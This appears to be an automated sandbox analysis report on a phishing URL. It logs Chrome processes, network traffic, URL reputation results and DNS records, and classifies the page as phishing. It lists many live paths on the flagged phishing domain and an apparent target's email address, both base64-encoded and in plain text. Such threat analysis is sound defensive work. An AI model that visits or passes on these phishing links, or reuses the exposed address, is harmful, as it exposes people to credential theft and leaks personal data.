        Source: chromecache_140.2.drString found in binary or memory: https://cloud.google.com/recaptcha-enterprise/billing-information
        Source: chromecache_110.2.drString found in binary or memory: https://code.jquery.com/jquery-3.6.0.min.js
        Source: chromecache_140.2.drString found in binary or memory: https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-reca
        Source: chromecache_140.2.drString found in binary or memory: https://developers.google.com/recaptcha/docs/faq#localhost_support
        Source: chromecache_140.2.drString found in binary or memory: https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-que
        Source: chromecache_140.2.drString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
        Source: chromecache_140.2.drString found in binary or memory: https://recaptcha.net
        Source: chromecache_110.2.drString found in binary or memory: https://sso.godaddy.com/v1/account/reset?app=o365&amp;realm=pass
        Source: chromecache_140.2.drString found in binary or memory: https://support.google.com/recaptcha
        Source: chromecache_140.2.drString found in binary or memory: https://support.google.com/recaptcha#6262736
        Source: chromecache_140.2.drString found in binary or memory: https://support.google.com/recaptcha/#6175971
        Source: chromecache_140.2.drString found in binary or memory: https://support.google.com/recaptcha/?hl=en#6223828
        Source: chromecache_140.2.drString found in binary or memory: https://www.apache.org/licenses/
        Source: chromecache_110.2.drString found in binary or memory: https://www.godaddy.com/
        Source: chromecache_110.2.drString found in binary or memory: https://www.godaddy.com/legal/agreements/cookie-policy
        Source: chromecache_110.2.drString found in binary or memory: https://www.godaddy.com/legal/agreements/privacy-policy?target=_blank
        Source: chromecache_110.2.drString found in binary or memory: https://www.google.com/recaptcha/api.js
        Source: chromecache_140.2.dr, chromecache_120.2.drString found in binary or memory: https://www.google.com/recaptcha/api2/
        Source: chromecache_140.2.drString found in binary or memory: https://www.gstatic.c..?/recaptcha/releases/joHA60MeME-PNviL59xVH9zs/recaptcha__.
        Source: chromecache_120.2.drString found in binary or memory: https://www.gstatic.com/recaptcha/releases/joHA60MeME-PNviL59xVH9zs/recaptcha__en.js
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
        Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
        Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
        Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
        Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
        Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
        Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
        Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
        Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
        Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
        Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
        Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
        Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
        Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
        Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
        Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
        Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
        Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
        Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
        Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
        Source: unknownHTTPS traffic detected: 2.19.104.72:443 -> 192.168.2.4:49744 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 2.19.104.72:443 -> 192.168.2.4:49746 version: TLS 1.2
        Source: classification engineClassification label: mal68.phis.win@18/75@22/12
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1876,i,16849530955463525120,13524078821275849099,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://oknya83345.eleteriod.com/infd201971/#YWhlaW5tYWFAY2lkZWwuY29t"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1876,i,16849530955463525120,13524078821275849099,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
        Process Injection
        1
        Process Injection
        OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
        Ingress Tool Transfer
        Traffic DuplicationData Destruction
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        https://oknya83345.eleteriod.com/infd201971/#YWhlaW5tYWFAY2lkZWwuY29t0%Avira URL Cloudsafe
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://code.jquery.com/jquery-3.6.0.min.js0%URL Reputationsafe
        https://developers.google.com/recaptcha/docs/faq#localhost_support0%URL Reputationsafe
        https://support.google.com/recaptcha#62627360%URL Reputationsafe
        https://support.google.com/recaptcha/?hl=en#62238280%URL Reputationsafe
        https://support.google.com/recaptcha/#61759710%URL Reputationsafe
        https://support.google.com/recaptcha0%URL Reputationsafe
        https://recaptcha.net0%URL Reputationsafe
        https://www.apache.org/licenses/0%URL Reputationsafe
        https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-que0%URL Reputationsafe
        https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-reca0%URL Reputationsafe
        https://cdn.socket.io/4.6.0/socket.io.min.js0%URL Reputationsafe
        https://a.nel.cloudflare.com/report/v4?s=zPJaEPJNSdKjbMKrJyLG3i2cNMoVf2JuXi6k6QIRB3W1%2FFK0tggvgtMaxzqURhdT3Vxq45tGjg4rnGTapv950CaW%2BCyFkNkxm3mG30uuEdW9ozT0sny2egzspWqW7A%3D%3D0%Avira URL Cloudsafe
        https://oknya83345.eleteriod.com/klB7kuQPnNOpgjTwJDNQWLIBBFa0XWEJbVMH8UZf3fXc0563H7XRHd32dCoJNir2Gheuv2200%Avira URL Cloudsafe
        https://oknya83345.eleteriod.com/ef8d6X647wRncbASI7KK9wvH19moijIGgbX7RvbPNBqe0tonNY6Y781480%Avira URL Cloudsafe
        https://oknya83345.eleteriod.com/web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket0%Avira URL Cloudsafe
        https://oknya83345.eleteriod.com/rsivy0f9LvMVoGwWXBY36UNQHJ5vLvLswbmHYZghDjaLx4bHrm3aZHETrLuA4WzXtVHef1980%Avira URL Cloudsafe
        https://www.godaddy.com/legal/agreements/privacy-policy?target=_blank0%Avira URL Cloudsafe
        https://oknya83345.eleteriod.com/ro9EGsgt7WhYocqNMxT5aKqWBswapyeJg6XDk6Wh1EcHQ86i0%Avira URL Cloudsafe
        https://sso.godaddy.com/v1/account/reset?app=o365&amp;realm=pass0%Avira URL Cloudsafe
        https://a.nel.cloudflare.com/report/v4?s=o0ekmHGO7BUUglj6sVXOCa9jW07J8%2BxhGuG7Gv6MyDJybA0DboQ9jX0yG5TgYHIu5YEKn4thwxOiKUMkx%2FMexzmMCRwigRjh97ib6vpP%2B%2F%2BpdHyAcT0C3menqQZ3Rw%3D%3D0%Avira URL Cloudsafe
        https://oknya83345.eleteriod.com/stFVFVBLRUZEe4WD3anWY2WwTjYsy9M2yanojV67aWExa5cPBbBIYHvasqNUwXwEuYef2560%Avira URL Cloudsafe
        https://challenges.cloudflare.com/turnstile/v0/b/695da7821231/api.js0%Avira URL Cloudsafe
        https://oknya83345.eleteriod.com/ghhzdSo0pCDRNfU983q6ExVmnoJ4rBpDRip5WrwOkA7XgKsbaoTE86uM122100%Avira URL Cloudsafe
        https://oknya83345.eleteriod.com/899Gmt1GFtekU1wpUI5scdHVrq7eMazbjlab710%Avira URL Cloudsafe
        https://www.google.com/recaptcha/api.js0%Avira URL Cloudsafe
        https://cloud.google.com/contact0%Avira URL Cloudsafe
        https://oknya83345.eleteriod.com/wxGHOVhNfB9eJCYocFlGLnZU0vLUJmndqUTPYn2iQJMFdfQ8jFqkPab1720%Avira URL Cloudsafe
        https://oknya83345.eleteriod.com/56rssvHl2yrWrn4cdsVelZ89180%Avira URL Cloudsafe
        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D0%Avira URL Cloudsafe
        https://oknya83345.eleteriod.com/mxCAKSFLZHZgSbiN6uhzP4xbZjf0%Avira URL Cloudsafe
        https://www.godaddy.com/legal/agreements/cookie-policy0%Avira URL Cloudsafe
        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/887dff9f6d8f429d/1716393414081/67D-SWS4mqjGPWf0%Avira URL Cloudsafe
        https://www.google.com/recaptcha/api2/0%Avira URL Cloudsafe
        https://cloud.google.com/recaptcha-enterprise/billing-information0%Avira URL Cloudsafe
        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=887dff9f6d8f429d0%Avira URL Cloudsafe
        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1078806175:1716390872:Qs3WyvFVlUI0IspEMP6EGCRsS1O73Ub7EXvElg-oaUk/887dff9f6d8f429d/4d20fcc93ec5b5c0%Avira URL Cloudsafe
        https://play.google.com/log?format=json&hasfast=true0%Avira URL Cloudsafe
        https://www.godaddy.com/0%Avira URL Cloudsafe
        https://oknya83345.eleteriod.com/infd201971/0%Avira URL Cloudsafe
        https://www.gstatic.c..?/recaptcha/releases/joHA60MeME-PNviL59xVH9zs/recaptcha__.0%Avira URL Cloudsafe
        https://oknya83345.eleteriod.com/wxfP08DYvObNreEbp4GjSTvlE38mAqrBh9MigjTGODhm121300%Avira URL Cloudsafe
        https://oknya83345.eleteriod.com/xyHr8Q78qpqZef290%Avira URL Cloudsafe
        https://oknya83345.eleteriod.com/56p7yi2p9RpjhqPghDmZgIJwAIJYRIQSD891100%Avira URL Cloudsafe
        https://oknya83345.eleteriod.com/23YPgTfaqT4mHAyzUabrdJNFlqxy690%Avira URL Cloudsafe
        https://oknya83345.eleteriod.com/qrRiGIunRIlmWDy4XNHkLCd9QMHuvoWva5jMdSjLAZIB0oQFclwOKeg98a9tc1j6cd2400%Avira URL Cloudsafe
        https://oknya83345.eleteriod.com/favicon.ico0%Avira URL Cloudsafe
        https://oknya83345.eleteriod.com/78kPf7VHCjo8RmwP45rSBdetCluv600%Avira URL Cloudsafe
        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/887dff9f6d8f429d/1716393414082/c0c2613fc26f1c8d1c5546c7cb6650be050f91d030f34066ed5eb405a0890187/hlziBgVNbWjZocR0%Avira URL Cloudsafe
        https://oknya83345.eleteriod.com/12BUrMGJQ5OOdz78ji9Tn5uQop500%Avira URL Cloudsafe
        https://oknya83345.eleteriod.com/efNetwmIjcotbWexft46IfrD56NZXTOFWmn990%Avira URL Cloudsafe
        https://oknya83345.eleteriod.com/klTwjvYzK7ZnXdGU0MmXwR8cdFcuUR6piy8Hoa781680%Avira URL Cloudsafe
        https://oknya83345.eleteriod.com/pq0hAI7qxScx87yzfXwx400%Avira URL Cloudsafe
        https://oknya83345.eleteriod.com/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js0%Avira URL Cloudsafe
        https://oknya83345.eleteriod.com/ijyi2hjS5erxCGdTqsT8BtwI3rNaQaISKnbm7WopvWzN1oLZWZsUwUlQNCWPnDUtG3kZb3yz2210%Avira URL Cloudsafe
        https://oknya83345.eleteriod.com/infd201971/?VEaheinmaa@cidel.com0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        a.nel.cloudflare.com
        35.190.80.1
        truefalse
          unknown
          oknya83345.eleteriod.com
          188.114.96.3
          truetrue
            unknown
            code.jquery.com
            151.101.66.137
            truefalse
              unknown
              d2vgu95hoyrpkh.cloudfront.net
              18.245.31.89
              truefalse
                unknown
                challenges.cloudflare.com
                104.17.3.184
                truefalse
                  unknown
                  www.google.com
                  216.58.206.36
                  truefalse
                    unknown
                    cdn.socket.io
                    unknown
                    unknownfalse
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      https://a.nel.cloudflare.com/report/v4?s=zPJaEPJNSdKjbMKrJyLG3i2cNMoVf2JuXi6k6QIRB3W1%2FFK0tggvgtMaxzqURhdT3Vxq45tGjg4rnGTapv950CaW%2BCyFkNkxm3mG30uuEdW9ozT0sny2egzspWqW7A%3D%3Dfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://oknya83345.eleteriod.com/web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocketfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://oknya83345.eleteriod.com/ef8d6X647wRncbASI7KK9wvH19moijIGgbX7RvbPNBqe0tonNY6Y78148false
                      • Avira URL Cloud: safe
                      unknown
                      https://code.jquery.com/jquery-3.6.0.min.jsfalse
                      • URL Reputation: safe
                      unknown
                      https://oknya83345.eleteriod.com/rsivy0f9LvMVoGwWXBY36UNQHJ5vLvLswbmHYZghDjaLx4bHrm3aZHETrLuA4WzXtVHef198false
                      • Avira URL Cloud: safe
                      unknown
                      https://oknya83345.eleteriod.com/klB7kuQPnNOpgjTwJDNQWLIBBFa0XWEJbVMH8UZf3fXc0563H7XRHd32dCoJNir2Gheuv220false
                      • Avira URL Cloud: safe
                      unknown
                      https://oknya83345.eleteriod.com/ro9EGsgt7WhYocqNMxT5aKqWBswapyeJg6XDk6Wh1EcHQ86ifalse
                      • Avira URL Cloud: safe
                      unknown
                      https://oknya83345.eleteriod.com/stFVFVBLRUZEe4WD3anWY2WwTjYsy9M2yanojV67aWExa5cPBbBIYHvasqNUwXwEuYef256false
                      • Avira URL Cloud: safe
                      unknown
                      https://a.nel.cloudflare.com/report/v4?s=o0ekmHGO7BUUglj6sVXOCa9jW07J8%2BxhGuG7Gv6MyDJybA0DboQ9jX0yG5TgYHIu5YEKn4thwxOiKUMkx%2FMexzmMCRwigRjh97ib6vpP%2B%2F%2BpdHyAcT0C3menqQZ3Rw%3D%3Dfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://oknya83345.eleteriod.com/ghhzdSo0pCDRNfU983q6ExVmnoJ4rBpDRip5WrwOkA7XgKsbaoTE86uM12210false
                      • Avira URL Cloud: safe
                      unknown
                      https://challenges.cloudflare.com/turnstile/v0/b/695da7821231/api.jsfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://oknya83345.eleteriod.com/wxGHOVhNfB9eJCYocFlGLnZU0vLUJmndqUTPYn2iQJMFdfQ8jFqkPab172false
                      • Avira URL Cloud: safe
                      unknown
                      https://oknya83345.eleteriod.com/infd201971/#YWhlaW5tYWFAY2lkZWwuY29ttrue
                        unknown
                        https://www.google.com/recaptcha/api.jsfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3Dfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://oknya83345.eleteriod.com/899Gmt1GFtekU1wpUI5scdHVrq7eMazbjlab71false
                        • Avira URL Cloud: safe
                        unknown
                        https://oknya83345.eleteriod.com/mxCAKSFLZHZgSbiN6uhzP4xbZjffalse
                        • Avira URL Cloud: safe
                        unknown
                        https://oknya83345.eleteriod.com/56rssvHl2yrWrn4cdsVelZ8918false
                        • Avira URL Cloud: safe
                        unknown
                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/887dff9f6d8f429d/1716393414081/67D-SWS4mqjGPWffalse
                        • Avira URL Cloud: safe
                        unknown
                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/nshcb/0x4AAAAAAAawZipfMclJYEh2/auto/normalfalse
                          unknown
                          https://oknya83345.eleteriod.com/infd201971/false
                          • Avira URL Cloud: safe
                          unknown
                          https://oknya83345.eleteriod.com/56p7yi2p9RpjhqPghDmZgIJwAIJYRIQSD89110false
                          • Avira URL Cloud: safe
                          unknown
                          https://oknya83345.eleteriod.com/infd201971/?VEaheinmaa@cidel.comfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=887dff9f6d8f429dfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://oknya83345.eleteriod.com/xyHr8Q78qpqZef29false
                          • Avira URL Cloud: safe
                          unknown
                          https://oknya83345.eleteriod.com/78kPf7VHCjo8RmwP45rSBdetCluv60false
                          • Avira URL Cloud: safe
                          unknown
                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1078806175:1716390872:Qs3WyvFVlUI0IspEMP6EGCRsS1O73Ub7EXvElg-oaUk/887dff9f6d8f429d/4d20fcc93ec5b5cfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://oknya83345.eleteriod.com/23YPgTfaqT4mHAyzUabrdJNFlqxy69false
                          • Avira URL Cloud: safe
                          unknown
                          https://oknya83345.eleteriod.com/wxfP08DYvObNreEbp4GjSTvlE38mAqrBh9MigjTGODhm12130false
                          • Avira URL Cloud: safe
                          unknown
                          https://oknya83345.eleteriod.com/efNetwmIjcotbWexft46IfrD56NZXTOFWmn99false
                          • Avira URL Cloud: safe
                          unknown
                          https://cdn.socket.io/4.6.0/socket.io.min.jsfalse
                          • URL Reputation: safe
                          unknown
